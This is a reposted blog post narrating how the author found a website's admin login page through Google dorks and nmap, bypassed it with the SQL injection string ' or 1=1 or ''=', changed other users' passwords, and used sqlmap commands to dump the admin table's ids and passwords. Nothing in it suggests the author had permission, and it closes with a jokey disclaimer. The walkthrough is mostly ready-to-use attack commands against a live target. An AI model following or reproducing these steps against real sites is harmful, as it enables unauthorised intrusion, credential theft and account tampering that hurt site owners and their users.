How did I hack a website

This article will record a journey how did i hack a website.


1.Gathering more and more informations

Google is a very useful tool,make good use of google hacking may yield twice the result with half the effort. Some significant

grammars are as follow:
filetype:txtintext:usernameand password  // - :exclude  intext:login

I found a target by using :

it was a admin’s login page. Then we need to find this website’s ip ,usually these two ways:

  • ping
  • whois

Next,use nmap to find more info about this website:

Only 80 port was opened. In general, more ports opened means more potential security vulnerability.For this website ,we can only attack it’s http server.

2.Preliminary test

Enter admin’ in the input box and it returned this page:

It means that the website exists sql injection.

Then use burpsuit to some basic test:

found some interesting test result, the sentence ‘ or 1=1 or ”=’ return different length of response,test this sentence:

Wow~ successful login !we can modify other user’s password:

But..that is not finished

3.Further penetration testing

Save the post request to post.txt through burp’s proxy,and call the sqlmap out:

sqlmap -r post.txt -p id --risk=3 --dbs

Boom…found it’s table name: adminid , continue:

sqlmap –r post.txt –p id --columns –T adminid


sqlmap -r post.txt -p id --dump -T adminid -C "id,passwd"

Haha.. admin’s id and password were out~

It’s just for fun,please don’t do sth bad~!

稿源:IT Dreamer (源链) | 关于 | 阅读提示

本站遵循[CC BY-NC-SA 4.0]。如您有版权、意见投诉等问题,请通过eMail联系我们处理。
酷辣虫 » 后端存储 » How did I hack a website

喜欢 (0)or分享给?

专业 x 专注 x 聚合 x 分享 CC BY-NC-SA 4.0

使用声明 | 英豪名录